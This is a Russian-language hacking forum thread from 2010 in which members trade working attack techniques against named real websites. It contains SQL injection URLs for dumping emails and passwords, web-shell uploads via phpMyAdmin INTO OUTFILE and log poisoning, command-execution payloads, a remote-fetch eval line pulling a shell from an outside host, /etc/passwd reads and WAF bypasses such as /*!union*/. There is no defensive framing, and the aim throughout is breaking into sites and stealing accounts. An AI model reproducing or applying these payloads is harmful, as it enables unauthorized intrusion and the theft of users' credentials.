Такой вопрос, как написать цикл, для вывода 12 кэсов учеток, если уязвимо s_users , нужно вывести mail и password, не одна программа не смогла сдампить...
Code:
union+select+concat_ws(0x2f,mail,password)+from+s_ users+limit+1,1--
чет тебя вообще не понятно :/
MastaBass1
15.11.2010, 01:43
DeepBlue7 said:
Code:
union+select+concat_ws(0x2f,mail,password)+from+s_ users+limit+1,1--
чет тебя вообще не понятно :/
Дампить лимитом 12 тысяч учеток вручную?=)
Ты что?
MastaBass1
15.11.2010, 01:49
Redwood said:
А эта по твоему по какому принципу дампит?
Тебе нужен программный пример реализации дампа через лимит или что ?
Нет, мне нужен пример цикла вывода в браузер, с моими параметрами....
Она дампит, эта прога только до 4 лимита....
DeepBlue7
15.11.2010, 02:02
MastaBass1 said:
Дампить лимитом 12 тысяч учеток вручную?=)
Ты что?
Йа кибарк.
MastaBass1
15.11.2010, 02:02
Redwood said:
Если руки кривые, значит уже ничего не поможет.
Не понимаю, если есть проблема и ты не знаешь как помочь, почему нужно вину валить на другого?
Я по-моему ясно объяснил что мне не нужны программы для дампа, мне просто нужен пример составления цикла вывода инъекции.
MastaBass1 said:
Не понимаю, если есть проблема и ты не знаешь как помочь, почему нужно вину валить на другого?
Я по-моему ясно объяснил что мне не нужны программы для дампа, мне просто нужен пример составления цикла вывода инъекции.
А в чём собственно проблема? Бери да пиши на PHP цикл и крути limit
Вот скрипт от Dr.Z3r0:
Dr.Z3r0 said:
Скрипт для вывода инфы через LIMIT или еще что нибудь этого рода
Code:
Крутит через лимит запросы.
Есть инъекция с file_priv:Y, помимо файлов можно читать и директории, но выдает их в слегка нечитаемом виде.
например /:
http://img844.imageshack.us/img844/6274/63232138.jpg
Есть ли возможность перевести в более читаемый режим и получить хотя бы список файлов/директорий?
freezed said:
Есть инъекция с file_priv:Y, помимо файлов можно читать и директории, но выдает их в слегка нечитаемом виде.
например /:
http://img844.imageshack.us/img844/6274/63232138.jpg
Есть ли возможность перевести в более читаемый режим и получить хотя бы список файлов/директорий?
Ссылку дайте, видимо у вас что-то с кодировкой.
Думаю, что с кодировкой все нормально, так как с чтением файлов проблем нет.
Привет, подскажите плз, где админка в http://www.runiga.ru/ ?
http://www.runiga.ru/panel/
Народ) кто знает почему такие траблы при залитии шелла через phpmyadmin
Вообщем имею доступ к пхпмайадмин под root'om с полными правами.
хочу залить шелл.
Мучу такой запрос:
CREATE TABLE `tableshell` (`shell` TEXT);
INSERT INTRO `tableshell` (`shell`) VALUES ('')
После второго запроса получаю такую ошибку:
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '`tableshell` (`shell`) VALUES (''' at line 1
Кто знает почему вылазит эта ошибка?
Пробовал другой выриант:
select '' from mysql.user into outfile 'E:/www.site.ru/shell.php'
Создается файл в корневой директории сайта.
Но при запросе http://www.site.ru/shell.php?cmd=dir получаю такую ошибку :
Parse error: syntax error, unexpected $end in E:\www.site.ru\shell.php(1) : eval()'d code on line 1
Что не так делаю? = \
GroM88
В первом случае у тебя нарушен синтаксис, верный запрос выглядит так:
PHP:
INSERT INTRO `tableshell` (`shell`) VALUES ("")
А если учесть, что не на всех серверах включена директива short_open_tag, то так:
PHP:
INSERT INTRO `tableshell` (`shell`) VALUES ("")
Не забывай, что при таком методе залития, директива allow_url_include - должна находиться в положении On, иначе шелл не проинклудится.
Во втором случае, нарушен синтаксис и отсутствует логика.
Во первых, после команды нужна точка с запятой, например для вывода phpinfo синтаксически верным был бы такой запрос:
PHP:
http://www.site.ru/shell.php?cmd=phpinfo();
Во вторых, если ты собираешься вызывать системные команды, а не просто эвалить php код (команда dir, является системной командой Windows), то нужно использовать соответствующие функции, либо заключать команды в тильды (``), чтобы php понимал, что эту команду нужно выполнить, как команду оболочки.
О функциях исполнения системных команд и их различиях, можешь почитать тут http://www.php.su/functions/?cat=exec
Вывод листинга директорий для Windows систем, c учетом кода, что ты залил, можно получить одним из следующих запросов (если конечно соответствующие функции не отключены на сервере или не включен safe mod):
PHP:
http://www.site.ru/shell.php?cmd=echo `dir`;
http://www.site.ru/shell.php?cmd=passthru('dir');
http://www.site.ru/shell.php?cmd=system('dir');
spiderbuber
16.11.2010, 12:08
Сегодня залил шел на ДЛЕшный сайт, заглянул в dbconfig.php и увидел, что до меня тут кто-то уже побавал.. В конце конфига прописано:
PHP:
if ((!isset($_COOKIE['dle_password'])) and ($_SERVER['REMOTE_ADDR']!="ИП_ЖЕРТВЫ") ) {
echo
HTML;
}
Я так понимаю, таким образом тырят куки юзеров.. А вот куда это сливается? Как самаму замутить такой слив?
spiderbuber said:
Сегодня залил шел на ДЛЕшный сайт, заглянул в dbconfig.php и увидел, что до меня тут кто-то уже побавал.. В конце конфига прописано:
PHP:
if ((!isset($_COOKIE['dle_password'])) and ($_SERVER['REMOTE_ADDR']!="ИП_ЖЕРТВЫ") ) {
echo
HTML;
}
Я так понимаю, таким образом тырят куки юзеров.. А вот куда это сливается? Как самаму замутить такой слив?
это больше на накрутку чего то тянет, по указанному выше адресу попадаем на страницу с фреймом где по идее юзеру парят примерно следующие куки
Set-Cookie: SL_003_0000=_10000_; domain=telefon4je.info; path=/; expires=Sat, 20-Nov-2010 18:35:15 GMT
Set-Cookie: TSUSER=003; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=telefon4je.info
Set-Cookie: SL_2_0000=_0_; domain=telefon4je.info; path=/; expires=Wed, 17-Nov-2010 14:35:15 GMT и переадресовывают 302 редиректом сюда new-xmading.ru
вопрос по limit
ни как не пойму, если сливать базу через скуль-инъекцию через limit то сливает от силы 20-30К, если же через where+id= то тянешь всю базу на 200-300К. почему limit выводит лишь часть?
spiderbuber said:
Сегодня залил шел на ДЛЕшный сайт, заглянул в dbconfig.php и увидел, что до меня тут кто-то уже побавал.. В конце конфига прописано:
PHP:
if ((!isset($_COOKIE['dle_password'])) and ($_SERVER['REMOTE_ADDR']!="ИП_ЖЕРТВЫ") ) {
echo
HTML;
}
Я так понимаю, таким образом тырят куки юзеров.. А вот куда это сливается? Как самаму замутить такой слив?
Это не куки тянут, а код кликандера поставили(реклама).
FlaktW said:
Помогите найти админку:
www.washingtoninstitute.org
Тебе сюда (https://antichat.live/threads/241942/)
посоветуйте программу или скрипт для слива бд. Чтоб прога сливала через where+id
http://site.ru/news.php?id=1+union+select+1,2,name,4+from+users+w here+id={index}--
а не через limit.
Подскажите, можно ли залить шелл?
http://www.skyalbum.com/showAlbum/-223451+union+select+1,2,3,4,5,6,concat%28user%28%2 9,0x3a,user,0x3a,password,0x3a,File_Priv,0x3a,Load _File%28%27/etc/httpd/conf/httpd.conf%27%29%29,8,9,10,11,12,13,14,15+from+mys ql.user--
Заранее благодарю...
Подскажите, можно ли залить шелл?
http://www.skyalbum.com/showAlbum/-223451+union+select+1,2,3,4,5,6,concat%28user%28%2 9,0x3a,user,0x3a,password,0x3a,File_Priv,0x3a,Load _File%28%27/etc/httpd/conf/httpd.conf%27%29%29,8,9,10,11,12,13,14,15+from+mys ql.user--
Заранее благодарю...
http://www.skyalbum.com/showAlbum/-223451+union+select+1,2,3,4,5,6,file_priv,8,9,10,1 1,12,13,14,15+from+mysql.user+where+user='skyalbum _db_user'--
да можно залить...
Спасибо, но что файл прив есть я знаю, мне интересно другое, мне нужно найти полный путь, но чет не получается, может он указан в каком-нить конфиге?
/etc/passwd читай, там все есть
freezed said:
/etc/passwd читай, там все есть
/etc/httpd/conf/httpd.conf
/usr/apache/httpd.conf
и так далее и тому подобное..тебе эти файлы о чем нибудь говорят ? в /etc/passwd очень редко путь абсолютный я находил..
Gorev said:
/etc/httpd/conf/httpd.conf
/usr/apache/httpd.conf
и так далее и тому подобное..тебе эти файлы о чем нибудь говорят ? в /etc/passwd очень редко путь абсолютный я находил..
мне говорят, но я же сначала глянул на этот сайт, а ты просто сумничать решил, тут, видимо, как раз тот редкий случай, когда в пассвд есть путь, а в хттпд.конф нет:
Code:
flash.dvd-photo-slideshow.com:x:502:48:flash.dvd-photo-slideshow.com:/var/www/flash.dvd-photo-slideshow.com:/sbin/nologin
jp.flash-slideshow-maker.com:x:503:48::/var/www/jp.flash-slideshow-maker.com:/sbin/nologin
m4p-mp3.tuneclone.com:x:504:48::/var/www/m4p-mp3.tuneclone.com:/sbin/nologin
skyalbum.com:x:505:48::/var/www/skyalbum.com:/sbin/nologin
freezed said:
мне говорят, но я же сначала глянул на этот сайт, а ты просто сумничать решил, тут, видимо, как раз тот редкий случай, когда в пассвд есть путь, а в хттпд.конф нет:
Code:
flash.dvd-photo-slideshow.com:x:502:48:flash.dvd-photo-slideshow.com:/var/www/flash.dvd-photo-slideshow.com:/sbin/nologin
jp.flash-slideshow-maker.com:x:503:48::/var/www/jp.flash-slideshow-maker.com:/sbin/nologin
m4p-mp3.tuneclone.com:x:504:48::/var/www/m4p-mp3.tuneclone.com:/sbin/nologin
skyalbum.com:x:505:48::/var/www/skyalbum.com:/sbin/nologin
придержи-ка свой язык..ты шелл залей по этому пути, потом вякай..
Gorev said:
придержи-ка свой язык..ты шелл залей по этому пути, потом вякай..
а при чем тут шелл? вопрос был в том, чтобы найти абсолютный путь, я подсказал, он указан в /etc/passwd, а папку с правами на запись уж пусть сам дальше ищет
что ж ты нервный-то такой
freezed said:
а при чем тут шелл? вопрос был в том, чтобы найти абсолютный путь, я подсказал, он указан в /etc/passwd, а папку с правами на запись уж пусть сам дальше ищет
что ж ты нервный-то такой
Не спорьте с Gorev. Он прав. И прекращайте флудить.
Фараон said:
Не спорьте с
Gorev
. Он прав.
Не всегда.
pinch said:
посоветуйте программу или скрипт для слива бд. Чтоб прога сливала через where+id
http://site.ru/news.php?id=1+union+select+1,2,name,4+from+users+w here+id={index}--
а не через limit.
можно такой примитив заюзать например
[PHP]
PHP:
[COLOR="#0000BB"]functionololo($url,$proxy='127.0.0.1')
{
$ch=curl_init($url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_PROXY,$proxy);
$content=curl_exec($ch);
curl_close($ch);
return$content;
}
$num='1000';// максимальный id
$regex='~(.*?)~';//ну ты понел
$f=fopen('db','a+');
for($i=0;$i[COLOR="#007700"]
lostelacoste
18.11.2010, 14:16
http://www.bookmg.ru/news/post/id.15'
можно ли раскрутить?
lostelacoste said:
http://www.bookmg.ru/news/post/id.15'
можно ли раскрутить?
как слепую точно можно:
true:
http://www.bookmg.ru/news/post/id.15+and+1=1
http://www.bookmg.ru/news/post/id.15+and+substring(@@version,1,1)='M'
http://www.bookmg.ru/news/post/id.15+and+(select+system_user)='sa'
false:
http://www.bookmg.ru/news/post/id.15+and+1=0
Hideofangel
18.11.2010, 16:50
Мог бы кто не будь рассказать или дать ссылки на русское описание по использованию(или видео) JBroFuzz?
Был бы весьма признателен.
P.S.Видео от создателей видел(OWASP),но может есть от наших умельцев.
Code:
http://www.bookmg.ru/news/post/id.-15 union all select @@version,null,null,null,null--
используя такую конструкцию пытаюсь извлечь пассы
union select password,2,3,4,5,6,7,8,9,10 from users --
выводит 1 пасс
групконкат не работает
union select password,2,3,4,5,6,7,8,9,10 from users limit 1 --
выводит тот же пасс
union select password,2,3,4,5,6,7,8,9,10 from users limit 2 --
выводит тот же пасс
union select password,2,3,4,5,6,7,8,9,10 from users limit 1,0 --
union select password,2,3,4,5,6,7,8,9,10 from users limit 1,1 --
union select password,2,3,4,5,6,7,8,9,10 from users limit 2,1 --
ничего не выводит
почему так может происходить? Как правильно сделать запрос?
ALIM said:
используя такую конструкцию пытаюсь извлечь пассы
union select password,2,3,4,5,6,7,8,9,10 from users --
выводит 1 пасс
групконкат не работает
union select password,2,3,4,5,6,7,8,9,10 from users limit 1 --
выводит тот же пасс
union select password,2,3,4,5,6,7,8,9,10 from users limit 2 --
выводит тот же пасс
union select password,2,3,4,5,6,7,8,9,10 from users limit 1,0 --
union select password,2,3,4,5,6,7,8,9,10 from users limit 1,1 --
union select password,2,3,4,5,6,7,8,9,10 from users limit 2,1 --
ничего не выводит
почему так может происходить? Как правильно сделать запрос?
union select password,2,3,4,5,6,7,8,9,10 from users where username='admin'--
Здесь есть скуля?
http://www.diymtb.com.au/displayItems.asp?cid=14'
Здесь есть скуля? http://www.diymtb.com.au/displayItems.asp?cid=14'
http://www.diymtb.com.au/displayItems.asp?cid=14'+order+by+10%23
pinch said:
http://www.diymtb.com.au/displayItems.asp?cid=14'+order+by+10%23
Не могу вывести version(),database(),user(). Как это сделать?
Сообщение от FlaktW
Не могу вывести version(),database(),user(). Как это сделать?
http://www.diymtb.com.au/displayItems.asp?cid=14'+union+select+1,2,concat(v ersion(),0x3a,database(),0x3a,user()),4,5,6,7,8,9, 10%23
p.s. не забудь +++ поставить я всетаки знаменитым хачу быть как Gorev...///=)))
Хм жаль беспокоить Как я могу загрузить оболочку здесь?
Code:
http://www.vales.by/catalog.php?action=show_object&id=-99%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29, database%28%29,version%28%29%29,17--
KandidaT'S
19.11.2010, 17:19
моно ли тут прочитать etc/passwd?
http://kirovka.ru/business/?parentid=-30&article=-641+union+select+1,2,3,4,5,6,7,8,9--
Хм жаль беспокоить Как я могу загрузить оболочку здесь?
Через phpbb который там есть (по крайней мере есть таблица phpbb3_acl_users)
http://www.vales.by/catalog.php?action=show_object&id=-99%20UNION%20SELECT%201,2,3,4,group_concat%28table _name%29,6,7,8,9,10,11,12,13,14,15,16,17+from+info rmation_schema.tables--
Админка (не форума http://www.vales.by/admin/login.php)
моно ли тут прочитать etc/passwd? http://kirovka.ru/business/?parentid=-30&article=-641+union+select+1,2,3,4,5,6,7,8,9--
Прочитать, кажись нельзя, но залить шелл возможно получится:
http://kirovka.ru/business/?parentid=-30&article=-641+union+select+1,2,concat_ws%280x3a,table_name%2 9,4,5,6,7,8,9+from+information_schema.tables+--+
Есть несколько форумов и так далее....
killrok6
19.11.2010, 18:59
Привет Всем! Подскажите правильно я перевел этот код:
UPDATE dbo.Character SET AddPoint = AddPoint + 1
WHERE AccountID = 'login'
На вот этот:
'update/**/dbo.character/**/set/**/addpoint='addpoint+1'/**/where/**/accountid='login'
Смотря что ты хочешь... если получить в базе addpoint+1, то да, если увеличить addpoint на единицу, то нет и, кстати, первый апостроф (перед update не нужен)
killrok6
19.11.2010, 19:09
z0mbyak said:
Смотря что ты хочешь... если получить в базе addpoint+1, то да, если увеличить addpoint на единицу, то нет и, кстати, первый апостроф (перед union не нужен)
union+update/**/dbo.character/**/set/**/addpoint='addpoint+1'/**/where/**/accountid='killro0000'
Типо так?
Если нужен инкремент addpoint, то /set/**/addpoint='addpoint'+1/
без union, это я обшибся малость
Вот пример
http://www.mysql.ru/webboard/index.html?n1=1160&n2=2
pinch said:
http://www.diymtb.com.au/displayItems.asp?cid=14'+union+select+1,2,concat(v ersion(),0x3a,database(),0x3a,user()),4,5,6,7,8,9, 10%23
Все равно, не могу найти. Набираю в браузере:
http://www.diymtb.com.au/displayItems.asp?cid=14'+union+select+1,2,user(),4 ,5,6,7,8,9,10%23
и, где выводиться user()?
дайте ссылки на уязвимости (только php-inj.sql-inj) в Wordpress версии:
2.7
2.9.2
3.0
3.0.1
z0mbyak said:
Если нужен инкремент addpoint, то /set/**/addpoint='addpoint'+1/
без union, это я обшибся малость
Вот пример
http://www.mysql.ru/webboard/index.html?n1=1160&n2=2
ну и кагбэ в инкременте ошиблись немного. кавычки не нужны, совсем.
Помогите подобрать количество столбцов.
http://calidad.com.au/ProdSearchResult.asp?cID=948-BK2'
Code:
http://calidad.com.au/ProdSearchResult.asp?cID=948-BK2' union select 1,2,3,4,5 from CalProd where 1 and '1
Бд - McAccess
Имхо, одна из самых неблагодарных субд для проведения инъекций)
И к тому же из-за наличия второго запроса с иным количеством полей мы не получим вывод)
Так что советую поискать другие параметры, бо (проверил) они там присутствуют.
З.ы - более подробно можно почитать тут:
/threadnav50550-1.html
kamaz said:
Code:
http://calidad.com.au/ProdSearchResult.asp?cID=948-BK2' union select 1,2,3,4,5 from CalProd where 1 and '1
Не могли бы вы уточнить, как вы нашли таблицу from CalProd. Это brutforce или какой то иной способ? Заранее спасибо за ответ.
Таблицу нашел исходя из сообщения об ошибке вот тут:
Code:
http://calidad.com.au/FindProdStep1.asp?MAN=Olivetti%27%29
Других способов узнать имена таблиц (кроме перебора, конечно же) в данном случае нет. Так как доступ к таблице MSysObjects закрыт.
kamaz said:
Таблицу нашел исходя из сообщения об ошибке вот тут:
Code:
http://calidad.com.au/FindProdStep1.asp?MAN=Olivetti%27%29
Других способов узнать имена таблиц (кроме перебора, конечно же) в данном случае нет. Так как доступ к таблице MSysObjects закрыт.
почти всегда есть доступ к msysaccessobjects
Konqi said:
почти всегда есть доступ к msysaccessobjects
Я имел ввиду то, что FlaktW наверняка захочет заполучить юзеров, и что ему для этого придется либо искать данные об этой таблице в ошибке, либо подбирать вручную))
З.ы - а для раскрутки скули да, msysaccessobjects - идеальный вариант)
Подскажите плиз, в джумле не загружается ни WSO2.4 ни BOFF1.0, пробывал и загружать, пробовал и код ихний вставлять в новосозданный документ, не помогло.
работает только C99madShell....
что это может быть????
сорри если не там написал
YupiSan said:
Подскажите плиз, в джумле не загружается ни WSO2.4 ни BOFF1.0, пробывал и загружать, пробовал и код ихний вставлять в новосозданный документ, не помогло.
работает только C99madShell....
что это может быть????
сорри если не там написал
всо некодированный залей...
1. подскажите где его взять?
2. что с ним дальше делать?
3. из-за чего это такое происходит на сайта?
wordpress ведет себя аналочитно....
YupiSan said:
1. подскажите где его взять?
2. что с ним дальше делать?
3. из-за чего это такое происходит на сайта?
wordpress ведет себя аналочитно....
C99madShell отличный шелл....вообще шелл который работает везде...
как сказал Redwood не везде..так что извиняюсь...99% будет работать
становится все интересней:
на старых шеллах ВСО тоже не работает, пишет что нету такого файла, а он та есть!!!
что можно сделать, другие шеллы ВСО на совместных сайтах норма работают...
что за мистика такая????
kamaz said:
Code:
http://calidad.com.au/ProdSearchResult.asp?cID=948-BK2' union select 1,2,3,4,5 from CalProd where 1 and '1
И к тому же из-за наличия второго запроса с иным количеством полей мы не получим вывод)
Так что советую поискать другие параметры, бо (проверил) они там присутствуют.
l
Перебрал все параметры на сайте, но вывода не добился. Не могли бы вы написать в каких параметрах, есть вывод?
Code:
http://calidad.com.au/prFullRange.asp?MAN=HP
Вот тут, например, есть вывод)
Но чтобы его добиться, придется немного поработать мозгом)
kamaz said:
Code:
http://calidad.com.au/prFullRange.asp?MAN=HP
Вот тут, например, есть вывод)
Но чтобы его добиться, придется немного поработать мозгом)
Не получается вывести. Не могли бы вы сообщите, каким запросом можно получить вывод?
как в sybase узнать общее количество записи, типа limit? или использовать только not in.
http://www.site.com/index.html?id=-4+or+1=convert(numeric,(select+max(convert(varchar ,username)||0x3a||password)+from+database..table))/**/
мне нужно узнать общее количетсво связки usernameassword
Здесь есть скуля?
http://www.airportdriver.at/index.php?id=21&lang=en'
FlaktW said:
Здесь есть скуля?
http://www.airportdriver.at/index.php?id=21&lang=en'
нет.
http://xxx.com/index.php?id=
Делаю такой запрос ч-з адресную строку
Перехожу:
http://xxx.com/index.php?id=../../../../../../../../../../../../../../../var/log/httpd/error_log%00
в логах
[Mon Nov 22 16:10:39 2010] [error] [client 222.222.222.222] File does not exist: /home/hgjhgjhgjhgjhg/favicon.ico, referer: http://xxx.com/index.php?id=%3C?php%20include(%22http://123.narod.ru/list.php%22);%20?%3E%00 [Mon Nov 22 16:10:41 2010] [error]
т.е. не пишется что он передался ч-з гет. хотя другие записи с гет есть.
access_log огромных размеров но в вверху вообще нет записей моего ip.
Ч-з какую прогу можно отправить правильный запрос чтобы залить шелл(inetcrack или аналоги) help plz
2 ALIM
смотри в акцесс_лог е, должно запысыватся USER_AGENT
если есть, то через тампер дату легко залить
Konqi said:
2 ALIM
смотри в акцесс_лог е, должно запысыватся USER_AGENT
если есть, то через тампер дату легко залить
Да сейчас посмотрел есть юзер-агент, спасибо)
Здесь возможно обойти фильтрацию?
http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+asdunionasdselec tasd+1,2,3,4,5,6,7,8,9,10,11,12+--+
FlaktW said:
Здесь возможно обойти фильтрацию?
http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+asdunionasdselec tasd+1,2,3,4,5,6,7,8,9,10,11,12+--+
это оракл:
http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+and+1=0+union+se lect+1111,null,null,null,null,null,null,null,null, null,null,null+from+sys.dual--
вывод в верхнем меню, где deutsch:
href="/oeaw_servlet/PersonenDetailsGeneric?id=1111"
с ораклом не сталкивался, поэтому как дальше крутить пока не могу подсказать
freezed said:
это оракл:
http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+and+1=0+union+se lect+1111,null,null,null,null,null,null,null,null, null,null,null+from+sys.dual--
вывод в верхнем меню, где deutsch:
href="/oeaw_servlet/PersonenDetailsGeneric?id=
1111
"
с ораклом не сталкивался, поэтому как дальше крутить пока не могу подсказать
Thanks! и +++++++++++
SHiNiGaMi
24.11.2010, 07:42
забрел на форум avira, оказался на ссылке http://forum.avira.com/wbb/index.php?page=LegalNotice, подставив вместо LegalNotice index, я вышел на index.php, т. е. http://forum.avira.com/wbb/index.php == http://forum.avira.com/wbb/index.php?page=index
является ли это инклудом(пытался другие страницы, /etc/passwd%00 и т.д., пишет, что страница не найдена)?
подскажите код, могу создавать страницы на сайте
выполняется команда показа информации о php
как сделать так чтобы можно было залить на сервер файл с другого сайта?
на большой код разных шеллов ругается
Parse error: syntax error, unexpected '>' in с:\xxx\www\includes\common.inc(1695) : eval()'d code on line 1
пробовал так тоже не получается
MuhaciR File Upload System
File:
Your File Must Be .php & it will be uploaded like muh.php
and you can
muhacir.php?&cmd1=[cmd]
muhacir.php?&cmd2=[cmd]
muhacir.php?inc=[shell]
';
fputs($fp, $entry_line);
fclose($fp);
?>
noviyuser said:
подскажите код, могу создавать страницы на сайте
выполняется команда показа информации о php
как сделать так чтобы можно было залить на сервер файл с другого сайта?
на большой код разных шеллов ругается
Parse error: syntax error, unexpected '>' in с:\xxx\www\includes\common.inc(1695) : eval()'d code on line 1
пробовал так тоже не получается
site.com/shell.php?cmd=eval(file_get_contents('http://site.ru/textshell.txt'));
Gorev said:
site.com/shell.php?cmd=eval(file_get_contents('http://site.ru/textshell.txt'));
Дополнение: в textshell.txt шелл должен лежать без дескрипторов в начале и конце.
Gorev said:
site.com/shell.php?cmd=eval(file_get_contents('http://site.ru/textshell.txt'));
Дополнение:Это при allow_url_fopen = on
~d0s~ said:
Дополнение:Это при allow_url_fopen = on
есть обход и этого дела
Делаю так:
http://203.101.40.168/mducorp/web/Maduraiheader.asp?fname=http://xxx.narod.ru/1.txt&c=ls -la
и так
http://203.101.40.168/mducorp/web/Maduraiheader.asp?fname=http://xxx.narod.ru/1.txt&c=ls
выводит текст файла, т.е.
'; system($_GET['c']); echo ''; }exit; ?>
Как можно заюзать?
ALIM said:
Делаю так:
http://203.101.40.168/mducorp/web/Maduraiheader.asp?fname=http://xxx.narod.ru/1.txt&c=ls -la
и так
http://203.101.40.168/mducorp/web/Maduraiheader.asp?fname=http://xxx.narod.ru/1.txt&c=ls
выводит текст файла, т.е.
'; system($_GET['c']); echo ''; }exit; ?>
Как можно заюзать?
ALIM
1. это не инклуд, просто файл открывается в фрейме
2. там используется технология ASP, а ты прикрепляеш пхп файл и хочеш интерпретировать )
и 3. если ASP то там 99% винда, а ты экзекаеш команду юникс ))
Konqi
а тут, вроде пхп?
http://www.echoeshub.com/recordings/ew.php?fname=http://xxx.narod.ru/1.txt
ALIM
Файлы читает
http://www.echoeshub.com/recordings/ew.php?fname=/etc/passwd
http://www.echoeshub.com/recordings/ew.php?fname=index.php
http://www.echoeshub.com/recordings/ew.php?fname=jumphere.css
Всем привет.
Подобрал количество полей. Как я понял вывод одного поля.
http://imperial.ca.gov/dept.php?id=-1+order+by+1
Но если попытаться вывести поле пишет ошибку - different number of columns
http://imperial.ca.gov/dept.php?id=-1+union+select+1
т.е. возможно, что здесь 3 версия MySQL?
Как нибудь инфу можно вытащить?
Или где почитать про это можно? Спасибо.
Strilo4ka
26.11.2010, 14:45
h3xf0x, в 3 union нет.
возможно несколько запросов, методом тыка подбирайте или выплевывайте в ошибки, ну или как слепую уже крутите.
а в title что
http://imperial.ca.gov/dept.php?id=-32+union+select+version()--
:: City of Imperial - 5.0.27-community-nt ::
h3xf0x said:
Всем привет.
Подобрал количество полей. Как я понял вывод одного поля.
http://imperial.ca.gov/dept.php?id=-1+order+by+1
Но если попытаться вывести поле пишет ошибку - different number of columns
http://imperial.ca.gov/dept.php?id=-1+union+select+1
т.е. возможно, что здесь 3 версия MySQL?
Как нибудь инфу можно вытащить?
Или где почитать про это можно? Спасибо.
Error Based метод:
Code:
http://imperial.ca.gov/dept.php?id=-1%20or%201%20group%20by%20concat((select%20version ()),floor(rand(0)*2))%20having%20min(0)%20or%201%2 0--%201
Strilo4ka said:
h3xf0x, в 3 union нет.
2Strilo4ka, версия там 5.0.27-community-nt
О! Всем большущее спасибо! А в тайтл то я и не догадался посмотреть =)
О! Всем большущее спасибо! А в тайтл то я и не догадался посмотреть =)
на будущее-смотри исходный код страницы...
В таблице 59 колонок:
http://www.site.com/index.php?id=-23+union+select+1,count(*),3,4,5,6,7,8,9,10+from+i nformation_schema.columns+where+table_name=admins+--+
59
Запрос вывел только 33 колонки.
http://www.site.com/index.php?id=-23+union+select+1,group_concat(0x0b,column_name),3 ,4,5,6,7,8,9,10+from+information_schema.columns+wh ere+table_name!='admins'+and+column_name>'NewKategorie4'+--+
Mitgliedsnummer,
Titel,
VorName,
Name,
Firma,
Adresse,
PLZ,
Ort,
Land,
Tel,
Mobil,
Fax,
EMail,
BCEMail,
Internet,
Zustelladresse,
BName,
Beschreibung,
Leitspruch,
Branche1,
Branche2,
Branche3,
Branche4,
Branche5,
Kategorie1,
Kategorie2,
Kategorie3,
Kategorie4,
Kategorie5,
NewKategorie1,
NewKategorie2,
NewKategorie3,
NewKategorie4
Помогите исправить ошибки в запросе, чтобы вывести остальные имена колонок в таблице через group_concat() не использую limit:
http://www.site.com/index.php?id=-23+union+select+1,group_concat(0x0b,column_name),3 ,4,5,6,7,8,9,10+from+information_schema.columns+wh ere+table_name!='admins'+and+column_name>'NewKategorie4'+--+
http://www.site.com/index.php?id=-23+union+select+1,group_concat(0x0b,column_name),3 ,4,5,6,7,8,9,10+from+information_schema.columns+wh ere+table_name!='admins'--
если каунт выводит 59 эт не факт что на вывод будет колонок 59....
FlaktW
http://www.site.com/index.php?id=-23+union+select+1,group_concat(0x0b,column_name),3 ,4,5,6,7,8,9,10+from+information_schema.columns+wh ere+table_name='admins'
http://www.site.com/index.php?id=-23+union+select+1,group_concat(0x0b,column_name),3 ,4,5,6,7,8,9,10+from+information_schema.columns+wh ere+table_name='admins'+and+column_name>'последняя выведенная колонка в предидущем запросе'
FlaktW кагбэ у функции group_concat() есть ограничение в 1024 выводимых символов.
[Feldmarschall]
27.11.2010, 00:44
Все повторяется..
уже годами так.. одни и теже вопросы и ответы.. вопросы... одни и теже ответы
+ одни и теже цитаты с "sql inj. faq"
у функции group_concat() есть ограничение в 1024 выводимых символов
даже это уже было уже сказано 10005000 раз..
Kiberpank
27.11.2010, 13:24
Мене заинтересовал такой тип атак, как переполнение буфера. Как он используется в программах я примерно понял, а вот как использовать его в интернете до меня пока не дошло . Дайте пожалуйста пару ссылок на описание этой уязвимости и способах её реализации для новичков.
Kiberpank said:
Мене заинтересовал такой тип атак, как переполнение буфера. Как он используется в программах я примерно понял, а вот как использовать его в интернете до меня пока не дошло
. Дайте пожалуйста пару ссылок на описание этой уязвимости и способах её реализации для новичков.
Вам сюда => Тыц (http://google.com)
вот такая статейка забавная (http://www.inattack.ru/article/539.html), остальное в гугле =)
А в общем мне кажетца что переполнение используют что б пробивать твой браузер. ( куяк и исполнение произвольного кода, а как юзать его далее это твое дело )
PS:Еще можно аппаратное переполнение использовать ( соседу в офисе принтер весить )
Kiberpank
27.11.2010, 16:50
Блин, ничего не понял . Есть какая-то статейка где самые основы? Какию проги юзать, на чём попрактиковаться можно?
метасплоит юзай там кажется было создание сплоитов на переполнение буфера
Есть SQLi.
Подобрал кол-во полей GROUP By'ем. А вот вставляю UNION, а веб-сервер говорит 406 Not Acceptable. Видать, юнион блочат? А можно ли такое чудо обойти?
Благодарен.
Вставку %00 и регистр пробывал.
Здесь есть скуля?
http://www.stenum.at/de/?id=news/news-archiv/news09'
FlaktW said:
Здесь есть скуля?
http://www.stenum.at/de/?id=news/news-archiv/news09'
Тут вообще нету связи с БД.
Есть SQLi.
Подобрал кол-во полей GROUP By'ем. А вот вставляю UNION, а веб-сервер говорит 406 Not Acceptable. Видать, юнион блочат? А можно ли такое чудо обойти?
Благодарен.
Вставку %00 и регистр пробывал.
/*!union*/
Господа!
Уязвимый скрипт находится в зоне в которую нужно залогиниться перед тем как увидеть страничку
Какой тулзой можно залогиниться на сайте для дампа базы?
(несколько тысяч акков, поэтому груп-конкат не подходит)
Юзаю тулзу пашкелы тно там такой возможности нет помоему
Help please
pinch said:
/*!union*/
Ты крут!, Пинч! Спасибо тебе и много радости.
Блин вот только словеса типа information_schema.tables, да и user() блокнуты. Только версию вытащил.
Ты крут!, Пинч! Спасибо тебе и много радости. Блин вот только словеса типа information_schema.tables, да и user() блокнуты. Только версию вытащил.
http://site/news.php?id=1+/*!union*/+select+1,2,3,table_name+from+information_schema./*!tables*/--
ps если не проканало пиши в лс разберемся...
